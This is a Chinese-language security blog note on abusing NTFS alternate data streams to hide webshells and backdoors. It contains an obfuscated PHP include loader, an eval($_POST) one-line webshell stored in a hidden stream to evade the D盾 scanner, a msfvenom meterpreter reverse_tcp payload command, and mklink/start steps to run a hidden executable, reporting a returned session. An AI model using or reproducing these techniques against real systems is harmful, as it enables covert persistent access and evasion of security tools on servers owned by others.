@Author: Patrilic
@Time: 2019-04-18 11:20:33

高铁上没事干,把以前的笔记总结一下
[toc]

ADS

NTFS交换数据流(alternate data streams,简称ADS)

ADS是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流,就是说除了主文件流之外还可以有许多非主文件流寄宿在主文件流中。它使用资源派生来维持与文件相关的信息,虽然我们无法看到数据流文件,但是它却是真实存在于我们的系统中的。创建一个数据交换流文件的方法很简单,命令为”宿主文件:准备与宿主文件关联的数据流文件”。 —– baike.baidu.com

文件命名:

ads.txt 普通txt文件 (主文件)
ads.txt:nop.txt (寄宿文件)

1bb96e55543dbb1493165cec47afc7af
使用dir命令不能看到,必须使用dir /r

d3973b4bd310ff1bd21deb5db2873e18

Webshell(过D盾)

1
C:\phpStudy\PHPTutorial\WWW\webshell>echo "<?php phpinfo();?>" > index.php:s.txt

b2ed2bf9d1766135d674e36ab42aa1ac
f40f0ed3186d78429c5000521b823e72

将 小马写入index.php:s.txt中 ,然后再index.php中include
D盾不能获取非主文件流

1
2
3
4
5
6
7
index.php

<?php
$a="696e6465782e70"."68703a732e747874";
$b="a";
include(PACK('H*',$$b))
?>

1
2
3
index.php:s.txt

<?php @eval($_POST['chopper']);?>

测试

0x01 环境

1
2
MacOS             ipaddress: 192.168.43.223
Windows 10 ipaddress: 192.168.121.132

0x02 生成shell

1
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=8888 -f exe -o shell.exe

0x03 植入后门

环境描述:拿到了webshell,经过提权,权限为本地管理员
上传一个后门文件
f0f797666014d4cb4f91d9e3e1a1e0ad

使用type将shell.exe数据写入依附在hello.txt上
99090aa172deaf9fe4ef2215b14b5e34

1
mklink "c:\backdoor\link.exe" "c:\backdoor\hello.txt:shell.exe"

server 2k3后不能直接执行exe,必须建立链接

1
start link.exe /b

f2eae722d0632ce91a23eeeafa1d079a

成功回弹session

Thanks

https://docs.microsoft.com/en-us/previous-versions/ms854468(v=msdn.10)
https://klionsec.github.io/2017/11/13/ntfs-streams/
https://blog.csdn.net/migee/article/details/56028011
https://blog.csdn.net/xiaoxuetu_/article/details/77318670